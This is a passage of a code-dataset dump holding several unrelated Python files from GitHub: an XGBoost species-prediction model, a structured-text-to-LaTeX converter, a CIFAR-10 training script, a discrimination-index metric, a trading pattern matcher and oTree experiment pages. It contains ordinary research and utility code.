TOP_N_SUBMISSION_RANKS\nfrom geo.models.data_paths import xgb_multimodel_groups_submission\nfrom geo.preprocessing.preprocessing import create_datasets\nfrom geo.preprocessing.preprocessing import extract_groups\nfrom geo.preprocessing.species_occurences import extract_species_occurences\nfrom geo.preprocessing.species_occurences import load_species_occurences\nfrom geo.data_paths import train_with_groups\nfrom geo.data_paths import test\nfrom geo.data_paths import named_groups\nfrom geo.metrics.mrr import mrr_score\nfrom geo.logging.log import log_start\nfrom geo.logging.log import log_end_xgb\nfrom geo.postprocessing.submission_maker import _make_submission_groups\nfrom geo.postprocessing.submission_maker import make_submission_groups_df\nfrom geo.postprocessing.get_ranks import get_ranks\n\ntrain_columns = [ \n 'chbio_1', 'chbio_2', 'chbio_3', 'chbio_4', 'chbio_5', 'chbio_6',\n 'chbio_7', 'chbio_8', 'chbio_9', 'chbio_10', 'chbio_11', 'chbio_12',\n 'chbio_13', 'chbio_14', 'chbio_15', 'chbio_16', 'chbio_17', 'chbio_18','chbio_19', \n 'etp', 'alti', 'awc_top', 'bs_top', 'cec_top', 'crusting', 'dgh', 'dimp', 'erodi', 'oc_top', 'pd_top', 'text',\n 'proxi_eau_fast', 'clc', 'latitude', 'longitude'\n]\n\n# setting the parameters for xgboost\nparams = {\n 'objective': 'binary:logistic',\n 'max_depth': 2,\n 'seed': 4242,\n 'silent': 1,\n 'eval_metric': 'logloss', # because we want to evaluate floats\n 'num_boost_round': 500,\n 'early_stopping_rounds': 10,\n 'verbose_eval': None,\n 'updater': 'grow_gpu',\n 'predictor': 'gpu_predictor',\n 'tree_method': 'gpu_hist'\n}\n\ndef run_multi_model_with_groups(use_multithread=True):\n log_start()\n print(\"Running xgboost multi model with groups...\")\n create_datasets()\n extract_groups()\n x_text = pd.read_csv(train_with_groups)\n extract_species_occurences()\n species_occ = load_species_occurences()\n n_groups = np.load(named_groups)\n species_occ_dict = {}\n for _, row in species_occ.iterrows():\n species_occ_dict[row[\"species\"]] = row[\"percents\"]\n \n x_test = pd.read_csv(test) \n y = x_text[\"species_glc_id\"]\n\n class_names = np.unique(y)\n\n x_train, x_valid, y_train, y_valid = train_test_split(x_text, y, test_size=train_val_split, random_state=seed)\n test_glc_ids = list(x_test[\"patch_id\"])\n valid_glc_ids = list(x_valid[\"patch_id\"])\n x_train = x_train[train_columns]\n x_valid = x_valid[train_columns]\n x_test = x_test[train_columns]\n\n if use_multithread:\n num_cores = mp.cpu_count()\n print(\"Cpu count:\", str(num_cores))\n result = Parallel(n_jobs=num_cores)(delayed(predict_species)(class_name,x_train, x_valid, x_test, y_train, y_valid) for class_name in tqdm(class_names))\n else:\n result = []\n for class_name in tqdm(class_names):\n result.append(predict_species(class_name, x_train, x_valid, x_test, y_train, y_valid))\n\n species = np.array([x for x, _, _ in result])\n #transpose because each species is a column\n predictions = np.array([y for _, y, _ in result]).T \n test_predictions = np.array([z for _, _, z in result]).T\n\n species_map = species\n species_count = len(species_map)\n valid_predictions = predictions\n test_predictions = test_predictions\n\n assert len(valid_predictions) == len(y_valid.index)\n assert len(test_predictions) == len(x_test.index)\n assert len(valid_predictions[0]) == species_count\n assert len(test_predictions[0]) == species_count\n\n print(\"Create test submission...\") \n df = make_submission_groups_df(TOP_N_SUBMISSION_RANKS, species_map, test_predictions, test_glc_ids, n_groups, species_occ_dict)\n df.to_csv(xgb_multimodel_groups_submission, index=False, sep=\";\", header=None)\n print(\"Finished.\", xgb_multimodel_groups_submission)\n\n print(\"Evaluate validation set...\") \n subm = _make_submission_groups(TOP_N_SUBMISSION_RANKS, species_map, valid_predictions, valid_glc_ids, n_groups, species_occ_dict)\n ranks = get_ranks(subm, y_valid, TOP_N_SUBMISSION_RANKS)\n score = mrr_score(ranks)\n print(\"MRR-Score:\", score * 100, \"%\")\n log_end_xgb(\"XGBoost Multi Model With Groups\", train_columns, params, score)\n\ndef predict_species(species, x_train, x_valid, x_test, y_train, y_valid):\n train_target = list(map(lambda x: 1 if x == species else 0, y_train))\n val_target = list(map(lambda x: 1 if x == species else 0, y_valid))\n d_train = xgb.DMatrix(x_train, label=train_target)\n d_valid = xgb.DMatrix(x_valid, label=val_target)\n d_test = xgb.DMatrix(x_test)\n watchlist = [(d_train, 'train'), (d_valid, 'valid')]\n \n bst = xgb.train(\n params, \n d_train, \n num_boost_round=params[\"num_boost_round\"], \n verbose_eval=params[\"verbose_eval\"],\n evals=watchlist, \n early_stopping_rounds=params[\"early_stopping_rounds\"]\n )\n\n plt_features(bst, d_train)\n pred = bst.predict(d_valid, ntree_limit=bst.best_ntree_limit)\n #print(\"validation-logloss for\", str(species) + \":\", log_loss(val_target, pred))\n pred_test = bst.predict(d_test, ntree_limit=bst.best_ntree_limit)\n\n return (species, pred, pred_test)\n\ndef plt_features(bst, d_test):\n print(\"Plot feature importances...\")\n _, ax = plt.subplots(figsize=(12,18))\n xgb.plot_importance(bst, color='red', ax=ax)\n plt.show()\n\nif __name__ == '__main__':\n run_multi_model_with_groups(use_multithread=True)","repo_name":"stefantaubert/lifeclef-geo-2018","sub_path":"geo/models/xgb/multi_model_with_groups.py","file_name":"multi_model_with_groups.py","file_ext":"py","file_size_in_byte":6692,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"8564223389","text":"class LaTeXClass:\n \"\"\"LaTeXClass parses structured text into LaTeX.\"\"\"\n\n element_types={\n '#text': '_text',\n 'StructuredTextDocument': 'document',\n 'StructuredTextParagraph': 'paragraph',\n 'StructuredTextExample': 'example',\n 'StructuredTextBullet': 'bullet',\n 'StructuredTextNumbered': 'numbered',\n 'StructuredTextDescription': 'description',\n 'StructuredTextDescriptionTitle': 'descriptionTitle',\n 'StructuredTextDescriptionBody': 'descriptionBody',\n 'StructuredTextSection': 'section',\n 'StructuredTextSectionTitle': 'sectionTitle',\n 'StructuredTextLiteral': 'literal',\n 'StructuredTextEmphasis': 'emphasis',\n 'StructuredTextStrong': 'strong',\n 'StructuredTextLink': 'link',\n 'StructuredTextXref': 'xref',\n 'StructuredTextInnerLink':'innerLink',\n 'StructuredTextNamedLink':'namedLink',\n 'StructuredTextUnderline':'underline',\n 'StructuredTextTable':'table',\n 'StructuredTextSGML':'sgml',\n }\n\n\n def dispatch(self, doc, level, output):\n getattr(self, self.element_types[doc.getNodeName()])(\n doc, level, output)\n \n def __call__(self, doc, level=1, header=1):\n r = []\n self.header = header\n self.dispatch(doc, level-1, r.append)\n return string.join(r, '')\n\n def _text(self, doc, level, output):\n output(tex_quote((doc.getNodeValue())))\n\n def document(self, doc, level, output):\n children = doc.getChildNodes()\n\n output(\"%begin document\\n\")\n\n# if (children and\n# children[0].getNodeName() == 'StructuredTextSection'):\n# output('\\n%s\\n\\n' %\n# children[0].getChildNodes()[0].getNodeValue())\n \n for c in children:\n getattr(self, self.element_types[c.getNodeName()])(\n c, level, output)\n\n output(\"%end document\\n\")\n\n\n def section(self, doc, level, output):\n children = doc.getChildNodes()\n for c in children:\n getattr(self, self.element_types[c.getNodeName()])(\n c, level+1, output)\n \n def sectionTitle(self, doc, level, output):\n sections = ['chapter', 'section', 'subsection',\n 'subsubsection', 'paragraph', 'subparagraph']\n \n output('\\\\%s{' % sections[level])\n for c in doc.getChildNodes():\n getattr(self, self.element_types[c.getNodeName()])(\n c, level, output)\n output('}\\n')\n\n def description(self, doc, level, output):\n p = doc.getPreviousSibling()\n if p is None or p.getNodeName() is not doc.getNodeName(): \n output('\\\\begin{description}\\n')\n for c in doc.getChildNodes():\n getattr(self, self.element_types[c.getNodeName()])(\n c, level, output)\n n = doc.getNextSibling()\n if n is None or n.getNodeName() is not doc.getNodeName(): \n output('\\\\end{description}\\n')\n \n def descriptionTitle(self, doc, level, output):\n output('\\\\item[')\n for c in doc.getChildNodes():\n getattr(self, self.element_types[c.getNodeName()])(\n c, level, output)\n output('] ')\n \n def descriptionBody(self, doc, level, output):\n for c in doc.getChildNodes():\n getattr(self, self.element_types[c.getNodeName()])(\n c, level, output)\n output('\\n')\n\n def bullet(self, doc, level, output):\n p = doc.getPreviousSibling()\n if p is None or p.getNodeName() is not doc.getNodeName():\n output('\\n\\\\begin{itemize}\\n')\n output('\\\\item ')\n for c in doc.getChildNodes():\n getattr(self, self.element_types[c.getNodeName()])(\n c, level, output)\n n = doc.getNextSibling()\n output('\\n')\n if n is None or n.getNodeName() is not doc.getNodeName(): \n output('\\n\\\\end{itemize}\\n')\n\n def numbered(self, doc, level, output):\n p = doc.getPreviousSibling()\n if p is None or p.getNodeName() is not doc.getNodeName(): \n output('\\n\\\\begin{enumerate}\\n')\n output('\\\\item ')\n for c in doc.getChildNodes():\n getattr(self, self.element_types[c.getNodeName()])(\n c, level, output)\n n = doc.getNextSibling()\n output('\\n')\n if n is None or n.getNodeName() is not doc.getNodeName():\n output('\\\\end{enumerate}\\n')\n\n def example(self, doc, level, output):\n i = 0\n for c in doc.getChildNodes():\n if i == 0:\n output('\\n\\\\begin{verbatim}\\n')\n output(c.getNodeValue())\n output('\\n\\\\end{verbatim}\\n')\n else:\n getattr(self, self.element_types[c.getNodeName()])(\n c, level, output)\n\n def paragraph(self, doc, level, output):\n output('\\n\\n')\n for c in doc.getChildNodes():\n if c.getNodeName() in ['StructuredTextParagraph']:\n getattr(self, self.element_types[c.getNodeName()])(\n c, level, output)\n else:\n getattr(self, self.element_types[c.getNodeName()])(\n c, level, output)\n output('\\\\par\\n')\n\n def link(self, doc, level, output):\n for c in doc.getChildNodes():\n getattr(self, self.element_types[c.getNodeName()])(\n c, level, output)\n output('(\\\\texttt{%s})' % doc.href)\n\n def emphasis(self, doc, level, output):\n output('{\\\\emph')\n for c in doc.getChildNodes():\n getattr(self, self.element_types[c.getNodeName()])(\n c, level, output)\n output('}')\n\n def literal(self, doc, level, output):\n output('\\\\begin{verbatim}')\n for c in doc.getChildNodes():\n output(cgi.escape(c.getNodeValue()))\n output('\\\\end{verbatim}')\n\n def strong(self, doc, level, output):\n output('\\\\textbf{')\n for c in doc.getChildNodes():\n getattr(self, self.element_types[c.getNodeName()])(\n c, level, output)\n output('}')\n \n def underline(self, doc, level, output):\n# output(\"\")\n for c in doc.getChildNodes():\n getattr(self, self.element_types[c.getNodeName()])(\n c, level, output)\n# output(\"\")\n \n def innerLink(self, doc, level, output):\n# output('[')\n for c in doc.getChildNodes():\n getattr(self, self.element_types[c.getNodeName()])(\n c, level, output)\n# output(']')\n \n def namedLink(self, doc, level, output):\n# output('[')\n for c in doc.getChildNodes():\n getattr(self, self.element_types[c.getNodeName()])(\n c, level, output)\n# output(']')\n \n def sgml(self, doc, level, output):\n for c in doc.getChildNodes():\n getattr(self, self.element_types[c.getNodeName()])(\n c, level, output)\n\n def xref(self, doc, level, output):\n# val = doc.getNodeValue()\n# output('[%s]' % (val, val) )\n output(val)\n \n def table(self, doc, level, output):\n \"\"\"A StructuredTextTable holds StructuredTextRow(s) which\n holds StructuredTextColumn(s). A StructuredTextColumn is a\n type of StructuredTextParagraph and thus holds the actual\n data.\"\"\"\n \n output(\"\\\\textbf{Tables not yet supported in STX\"\n \"$\\\\rightarrow$ \\\\LaTeX conversions.}\")\n return None\n output('
        \\n')\n for row in doc.getRows()[0]:\n output(\"\\n\")\n for column in row.getColumns()[0]:\n if hasattr(column,\"getAlign\"):\n str = '<%s colspan=\"%s\" align=\"%s\" valign=\"%s\">' % (column.getType(),\n column.getSpan(),\n column.getAlign(),\n column.getValign())\n else:\n str = '\\n\")\n output(\"\\n\")\n output(\"
        ' % column.getSpan()\n output(str)\n for c in column.getChildNodes():\n getattr(self, self.element_types[c.getNodeName()])(c, level, output)\n if hasattr(column,\"getType\"):\n output(\"\\n\")\n else:\n output(\"
        \\n\")\n","repo_name":"gocept/Products.DTMLTeX","sub_path":"LaTeXClass.py","file_name":"LaTeXClass.py","file_ext":"py","file_size_in_byte":9097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28862893359","text":"import argparse\r\nimport shutil\r\n\r\nimport torchvision.models\r\n\r\nimport train_operation as operation\r\nimport model_genotype as genotype\r\nimport models\r\n\r\nimport torch\r\nimport torch.utils.data\r\nimport torch.optim as optim\r\nimport torch.backends.cudnn as cudnn\r\nimport torch.nn as nn\r\nimport torchvision.transforms as transforms\r\nfrom tensorboardX import SummaryWriter\r\nimport sys\r\nimport numpy as np\r\nimport logging\r\nimport time\r\nimport os\r\n\r\n# =================================================================================\r\n# set arguments for Terminal input\r\nparser = argparse.ArgumentParser(\"Train an architecture created by genome\")\r\nparser.add_argument('--genofile', type=str, default=None, help='genome file path')\r\nparser.add_argument('--n_geno', type=int, default=1, help='No. of genome in file')\r\n\r\nparser.add_argument('--save', type=str, default='train', help='experiment name')\r\nparser.add_argument('--seed', type=int, default=0, help='random seed')\r\n\r\nparser.add_argument('--n_blocks', type=int, default=5, help='number of blocks in a cell')\r\nparser.add_argument('--n_nodes', type=int, default=4, help='number of nodes per phases')\r\n\r\nparser.add_argument('--init_channels', type=int, default=36, help='channels of filters for first cell')\r\nparser.add_argument('--layers', type=int, default=20, help='number of layers of the networks')\r\nparser.add_argument('--epochs', type=int, default=600, help='training epochs for each individual')\r\n\r\nparser.add_argument('--device', type=str, default='cuda:0', help='GPU/CPU device selected')\r\n\r\nargs = parser.parse_args()\r\nargs.save = '{}-{}'.format(args.save, time.strftime(\"%Y%m%d-%H%M%S\"))\r\n\r\n\r\ndevice = args.device if torch.cuda.is_available() else 'cpu'\r\n\r\nsys.path.insert(0, '/data/sunliang/sunliang/projects/nas')\r\n\r\n# =================================================================================\r\ndef mkdir_save(path, scripts_to_save=None):\r\n if not os.path.exists(path):\r\n os.mkdir(path)\r\n # print(f'Experiment directory: {path}')\r\n\r\n if scripts_to_save is not None:\r\n os.mkdir(os.path.join(path, 'scripts'))\r\n for script in scripts_to_save:\r\n dst_file = os.path.join(path, 'scripts', os.path.basename(script))\r\n shutil.copyfile(script, dst_file)\r\n\r\n\r\nmkdir_save(args.save)\r\nlog_format = '%(asctime)s %(message)s'\r\nlogging.basicConfig(stream=sys.stdout, level=logging.INFO,\r\n format=log_format, datefmt='%m/%d %I:%M:%S %p')\r\nfh = logging.FileHandler(os.path.join(args.save, 'log.txt'))\r\nfh.setFormatter(logging.Formatter(log_format))\r\nlogging.getLogger().addHandler(fh)\r\n\r\n\r\ndef cifar10_transforms():\r\n CIFAR_MEAN = [0.49139968, 0.48215827, 0.44653124]\r\n CIFAR_STD = [0.24703233, 0.24348505, 0.26158768]\r\n\r\n train_transform = transforms.Compose([\r\n transforms.RandomCrop(32, padding=4),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor()\r\n ])\r\n\r\n train_transform.transforms.append(transforms.Normalize(CIFAR_MEAN, CIFAR_STD))\r\n\r\n valid_transform = transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Normalize(CIFAR_MEAN, CIFAR_STD)\r\n ])\r\n return train_transform, valid_transform\r\n\r\n\r\ndef load_genome(file, number=1):\r\n genome = []\r\n s = \"\"\r\n with open(file) as f:\r\n for i in range(number):\r\n s = f.readline()\r\n genome = list(map(int, s.split(' ')[:-1]))\r\n return genome\r\n\r\n\r\ndef main():\r\n\r\n writer = SummaryWriter(logdir=os.path.join(args.save, 'logs'))\r\n\r\n seed = args.seed\r\n torch.cuda.set_device(device)\r\n cudnn.enabled = True\r\n cudnn.benchmark = True\r\n torch.manual_seed(seed)\r\n torch.cuda.manual_seed(seed)\r\n\r\n # genome = genotype.test_genome\r\n # geno = genotype.decode(genome)\r\n # geno = genotype.TestNet\r\n genome = load_genome(args.genofile, args.n_geno)\r\n geno = genotype.decode(genome)\r\n net = models.NetworkCIFAR(C=args.init_channels, num_classes=10, layers=args.layers, auxiliary=True, genotype=geno).to(device)\r\n\r\n train_transform, valid_transform = cifar10_transforms()\r\n train_set = torchvision.datasets.CIFAR10(root='../data/', train=True, transform=train_transform, download=True)\r\n valid_set = torchvision.datasets.CIFAR10(root='../data/', train=False, transform=valid_transform, download=True)\r\n\r\n train_loader = torch.utils.data.DataLoader(train_set, batch_size=96, shuffle=True, num_workers=2, pin_memory=True)\r\n valid_loader = torch.utils.data.DataLoader(valid_set, batch_size=96, shuffle=False, num_workers=2, pin_memory=True)\r\n\r\n dummy_input = torch.rand(2, 3, 32, 32).to(device)\r\n writer.add_graph(net, [dummy_input, ])\r\n n_flops, n_params = operation.get_flops(net, device)\r\n\r\n logging.info(f'genome: {genome}\\n\\n')\r\n logging.info(f'genotype: {geno}\\n\\n')\r\n logging.info(f'FLOPs: {n_flops / 1e6} M\\n')\r\n logging.info(f'Params: {n_params / 1e6} M\\n')\r\n\r\n with open(os.path.join(args.save, 'result'), 'a') as f:\r\n f.write(f'genome: {genome}\\n\\n')\r\n f.write(f'genotype: {geno}\\n\\n')\r\n f.write(f'FLOPs: {n_flops / 1e6} M\\n')\r\n f.write(f'Params: {n_params / 1e6} M\\n')\r\n\r\n epochs = args.epochs\r\n\r\n parameters = filter(lambda p: p.requires_grad, net.parameters())\r\n criterion = nn.CrossEntropyLoss().to(device)\r\n optimizer = optim.SGD(parameters, lr=0.025, momentum=0.9, weight_decay=3e-4)\r\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, epochs, eta_min=0.0)\r\n # optimizer = optim.Adam(parameters, lr=0.03)\r\n valid_acc = 0.0\r\n for epoch in range(epochs):\r\n logging.info(f'epoch {epoch} lr {scheduler.get_lr()[0]}')\r\n\r\n train_loss, train_acc = train(train_loader, net, criterion, optimizer)\r\n valid_loss, valid_acc = infer(valid_loader, net, criterion)\r\n scheduler.step()\r\n torch.save(net.state_dict(), os.path.join(args.save, 'weight.pth'))\r\n\r\n logging.info(f'epoch {epoch+1}/{epochs}\\tloss:{train_loss}\\tacc:{valid_acc}')\r\n writer.add_scalar('loss', train_loss, epoch+1)\r\n writer.add_scalar('Accuracy', valid_acc, epoch+1)\r\n\r\n writer.close()\r\n with open(os.path.join(args.save, 'result'), 'a') as f:\r\n f.write(f'Accuracy: {valid_acc}\\n')\r\n logging.info(f\"output result file: {os.path.join(args.save, 'result')}\")\r\n logging.info(f\"save model weight in file: {os.path.join(args.save, os.path.join(args.save, 'weight.pth'))}\")\r\n\r\n\r\ndef train(train_loader, net, criterion, optimizer, auxiliary=False):\r\n net.train()\r\n train_loss = 0\r\n correct = 0\r\n total = 0\r\n\r\n for step, (inputs, targets) in enumerate(train_loader):\r\n inputs, targets = inputs.to(device), targets.to(device)\r\n optimizer.zero_grad()\r\n outputs, outputs_aux = net(inputs)\r\n loss = criterion(outputs, targets)\r\n\r\n if auxiliary:\r\n loss_aux = criterion(outputs_aux, targets)\r\n loss += loss_aux * 0.4\r\n\r\n loss.backward()\r\n nn.utils.clip_grad_norm_(net.parameters(), 5)\r\n optimizer.step()\r\n\r\n train_loss += loss.item()\r\n _, predicted = outputs.max(1)\r\n total += targets.size(0)\r\n correct += predicted.eq(targets).sum().item()\r\n\r\n logging.info('train acc %f', 100. * correct / total)\r\n\r\n return train_loss / total, 100.*correct/total\r\n\r\n\r\ndef infer(valid_loader, net, criterion):\r\n net.eval()\r\n test_loss = 0\r\n correct = 0\r\n total = 0\r\n\r\n with torch.no_grad():\r\n for step, (inputs, targets) in enumerate(valid_loader):\r\n inputs, targets = inputs.to(device), targets.to(device)\r\n outputs, _ = net(inputs)\r\n loss = criterion(outputs, targets)\r\n\r\n test_loss += loss.item()\r\n _, predicted = outputs.max(1)\r\n total += targets.size(0)\r\n correct += predicted.eq(targets).sum().item()\r\n\r\n acc = 100. * correct / total\r\n logging.info('valid acc %f', 100. * correct / total)\r\n\r\n return test_loss / total, acc\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n","repo_name":"szu-advtech/AdvTech","sub_path":"2022/13-孙亮 指导老师-周杰/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8026,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"19"} +{"seq_id":"9044054737","text":"# -*-coding:utf-8 -*-\n\n\"\"\"\nCalc the Polytomous Discrimination Index(PDI)\naccording to\nExtending the c-statistic to nominal polytomous outcomes: the Polytomous Discrimination Index\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\n\ndef calc_pdi(y, preds, classes):\n \"\"\"\n :param y: 1-dim label numpy array of samples\n\n :param preds: 2-dim probability numpy array of samples\n\n :param classes: array-like of shape [n_classes]\n Uniquely holds the label for each class.\n\n :return: [dpi, category_dpi_0, category_dpi_1, category_dpi_2]\n \"\"\"\n probs_0 = preds[y == classes[0]]\n probs_1 = preds[y == classes[1]]\n probs_2 = preds[y == classes[2]]\n total = len(probs_0) * len(probs_1) * len(probs_2)\n dpis = []\n for i in range(3):\n cnt = 0\n for prob_0 in probs_0:\n for prob_1 in probs_1:\n for prob_2 in probs_2:\n mat = np.vstack((prob_0, prob_1, prob_2))\n if np.argmax(mat[:, i]) == i:\n cnt += 1\n dpis.append(cnt / total)\n return [np.average(dpis), ] + dpis\n\n\nif __name__ == '__main__':\n filename = 'data/pdi/input.csv'\n\n df = pd.read_csv(filename)\n\n y = np.array(df['label'])\n preds = np.array(df.iloc[:, 1:4])\n classes = df.columns[1:]\n\n result = calc_pdi(y, preds, classes)\n\n print(\"dpi: %.3f\" % result[0])\n for i in range(3):\n print(\"category_dpi_%s: %.3f\" % (classes[i], result[i + 1]))\n","repo_name":"cilcmc/dlrcc","sub_path":"evaluation/pdi.py","file_name":"pdi.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"17923989447","text":"from ..enums import enums\n\n\ndef percent_change(_start_point, _current_point):\n try:\n if _start_point > _current_point:\n x = -((float(_start_point) - float(_current_point)) / abs(_current_point)) * 100\n else:\n x = ((float(_current_point) - float(_start_point)) / abs(_start_point)) * 100\n if x == 0.0:\n return 0.000000001\n else:\n return x\n except:\n return 0.000000001\n\n\nclass PercentageSimilarity:\n def __init__(self, constants, _pattern_array, _performance_array):\n self.constants = constants\n self._pattern_array = list(_pattern_array)\n self._performance_array = list(_performance_array)\n\n def get_predicted_outcomes(self, pattern):\n \"\"\"\n This function goes through all the data in the arrays and returns the amount of similar patterns\n :param pattern:\n :return: returns the predicted outcomes array which holds all the outcomes from the similar patterns\n \"\"\"\n # This is the array of predicted outcomes from all the patterns\n _predicted_outcomes_array = []\n # iterates through the historic data array to find similar patterns\n for b in range(len(self._pattern_array)):\n # Uses a should skip boolean to check whether to skip the current pattern completely\n _should_skip = False\n # Gets the pattern that it will use\n _each_pattern = self._pattern_array[b]\n # Goes through the pattern and sees if each percentage change is within the right limit, else continue\n for i in range(0, self.constants.get_pattern_len() - 1, 1):\n if abs(percent_change(_each_pattern[i], pattern[i])) > 500:\n _should_skip = True\n break\n # Only skips if one of the data points is too far out and doesn't meet the requirement\n if _should_skip:\n continue\n # If it all passes, then it appends the result of that array to the array that holds all the results\n _predicted_outcomes_array.append(self._performance_array[b])\n # returns that array\n return _predicted_outcomes_array\n\n def get_result_of_pc(self, pattern):\n\n _predicted_outcomes_array = self.get_predicted_outcomes(pattern)\n\n # Calculates the number of patterns found from the returned array of previous outcomes\n _num_patterns_found = len(_predicted_outcomes_array)\n # If the number is greater than the required amount, it can continue\n if _num_patterns_found > self.constants.get_num_pattern_req():\n # It averages the outcome of all the numbers in the array to get an average outcome\n _predicted_avg_outcome = reduce(lambda x, y: x + y, _predicted_outcomes_array) / _num_patterns_found\n\n # It then decides whether the 'difference' is great enough to be worthy of a trade\n # Initialises the _option to N/A in case that there is not the required difference, it won't cause an error\n _option = enums.Option.NO_TRADE\n if _predicted_avg_outcome < -self.constants.get_required_difference():\n # SELLS\n _option = enums.Option.SELL\n elif _predicted_avg_outcome > self.constants.get_required_difference():\n # BUYS\n _option = enums.Option.BUY\n\n # If there has been a trade\n if _option != enums.Option.NO_TRADE:\n return _option\n else:\n # No patterns have been found or criteria not met\n return None\n else:\n return None\n","repo_name":"AndrewSkea/TradingBackTester","sub_path":"src/functions/percentage_similarity.py","file_name":"percentage_similarity.py","file_ext":"py","file_size_in_byte":3674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"13851937470","text":"from ._builtin import Page, WaitPage\nfrom otree.api import Currency as c, currency_range\nfrom .models import Constants, levenshtein, distance_and_ok\nfrom django.conf import settings\n\nimport random\n\nclass Introduction(Page):\n form_model = 'player'\n form_fields = ['spanish']\n \"\"\"Description of the game: How to play and returns expected\"\"\"\n pass\n\n\nclass Transcribe(Page):\n form_model = 'player'\n form_fields = ['transcribed_text']\n\n # Don't display this Transcribe page if the \"transcription\" value in\n # the dictionary representing this round in config.py is False\n def is_displayed(self):\n if (Constants.config[0][self.round_number - 1][\"transcription\"] == False):\n return False\n\n # Don't display this Transcribe page for each player who has completed\n # the first transcription task\n for p in self.player.in_all_rounds():\n if(p.transcriptionDone):\n return False\n\n return True\n\n def vars_for_template(self):\n return {\n 'image_path': 'real_effort/paragraphs/{}.png'.format(2), \n 'reference_text': Constants.reference_texts[1],\n 'debug': settings.DEBUG,\n 'required_accuracy': 100 * (1 - Constants.allowed_error_rates[1]),\n }\n\n def transcribed_text_error_message(self, transcribed_text):\n \"\"\"Determines the player's transcription accuracy.\"\"\"\n\n reference_text = Constants.reference_texts[1]\n allowed_error_rate = Constants.allowed_error_rates[1]\n distance, ok = distance_and_ok(transcribed_text, reference_text,\n allowed_error_rate)\n if ok:\n self.player.levenshtein_distance = distance\n self.player.ratio = 1 - distance / Constants.maxdistance2\n else:\n if allowed_error_rate == 0:\n return \"The transcription should be exactly the same as on the image.\"\n else:\n return \"This transcription appears to contain too many errors.\"\n\n def before_next_page(self):\n \"\"\"Initialize payoff to have a default value of 0\"\"\"\n self.player.payoff = 0\n\n\nclass Transcribe2(Page):\n form_model = 'player'\n form_fields = ['transcribed_text2']\n\n def is_displayed(self):\n # Don't display this Transcribe page if the \"transcription\" value in\n # the dictionary representing this round in config.py is False\n if (Constants.config[0][self.round_number - 1][\"transcription\"] == False):\n self.player.ratio = 1\n return False\n\n # Don't display this Transcribe page for each player who has completed\n # the second transcription task\n for p in self.player.in_all_rounds():\n if(p.transcriptionDone): \n return False\n\n return True\n\n def vars_for_template(self):\n return {\n 'image_path': 'real_effort/paragraphs/{}.png'.format(1),\n 'reference_text': Constants.reference_texts[0],\n 'debug': settings.DEBUG,\n 'required_accuracy': 100 * (1 - Constants.allowed_error_rates[0]),\n }\n\n def before_next_page(self):\n \"\"\"Initialize payoff to have a default value of 0\"\"\"\n self.player.payoff = 0\n\n\nclass TranscribeResults(Page):\n form_model = 'player'\n form_fields = []\n\n def is_displayed(self):\n # Don't display the TranscribeResults page listing each player's transcription\n # accuracy (levenshtein value) if the \"transcription\" value in\n # the dictionary representing this round in config.py is False\n if (Constants.config[0][self.round_number - 1][\"transcription\"] == False):\n return False\n\n # Don't display this TranscribeResults page for each player who has completed\n # the second transcription task\n for p in self.player.in_all_rounds():\n if(p.transcriptionDone):\n return False\n\n return True\n\n\n def vars_for_template(self):\n table_rows = []\n config = Constants.config\n self.player.income = config[0][self.round_number - 1][\"end\"]\n\n for prev_player in self.player.in_all_rounds():\n # Income calculation done here\n if prev_player.transcribed_text == None:\n prev_player.transcribed_text = \"\"\n prev_player.levenshtein_distance = 0\n\n row = { \n 'round_number': prev_player.round_number,\n 'reference_text_length': len(Constants.reference_texts[1]),\n 'transcribed_text_length': len(prev_player.transcribed_text),\n 'distance': prev_player.levenshtein_distance,\n 'ratio': 1 - prev_player.levenshtein_distance / Constants.maxdistance2,\n }\n\n self.player.ratio = 1 - prev_player.levenshtein_distance / Constants.maxdistance2\n self.player.income *= self.player.ratio\n\n table_rows.append(row)\n\n return {'table_rows': table_rows}\n\n def before_next_page(self):\n # Disables transcription for the rest of the game\n self.player.transcriptionDone = True\n\n\nclass part2(Page):\n form_model = 'player'\n form_fields = ['contribution']\n\n def contribution_max(self):\n \"\"\"Dynamically sets the maximum amount of each player's income that he/she can report\"\"\"\n return self.player.income\n\n def vars_for_template(self):\n # If transcription mode is set to true for this round, set the player's income according\n # to their transcription accuracy\n if self.player.ratio == 1 and Constants.config[0][self.round_number - 1][\"transcription\"] == True:\n for p in self.player.in_all_rounds():\n if p.ratio < 1:\n self.player.ratio = p.ratio\n self.player.income *= self.player.ratio\n break\n\n config = Constants.config\n\n # Displays the tax as a percentage rather than as a decimal between 0 and 1\n self.player.ratio = round(self.player.ratio, 5)\n displaytax = config[0][self.round_number - 1][\"tax\"] * 100\n\n return {'ratio': self.player.ratio, 'income': self.player.income, 'tax': displaytax,\n 'flag': config[0][self.round_number - 1][\"transcription\"],\n 'mult': config[0][self.round_number - 1][\"multiplier\"]}\n\n\nclass resultsWaitPage(WaitPage):\n def after_all_players_arrive(self):\n config = Constants.config\n group = self.group\n players = group.get_players()\n\n \"\"\"\n contributions = [p.contribution * config[0][int(self.round_number - 1)][\"tax\"] for p in players]\n group.total_contribution = sum(contributions)\n group.total_earnings = config[0][self.round_number - 1][\"multiplier\"] * group.total_contribution\n group.individual_share = group.total_earnings / Constants.players_per_group\n\n for p in players:\n p.payoff = p.income - (config[0][int(self.round_number - 1)][\"tax\"] * p.contribution) + group.individual_share\n \"\"\"\n\n # Generate a random player ID to determine who will be the authority\n group.random_player = random.randint(1, Constants.players_per_group)\n print(\"random player id is\", group.random_player)\n\n pass\n\nclass Authority(Page):\n form_model = 'group'\n form_fields = ['authority_multiply']\n\n def is_displayed(self):\n config = Constants.config\n group = self.group\n\n mode_num = config[0][self.round_number - 1][\"mode\"]\n\n if (mode_num == 1 and self.player.id_in_group 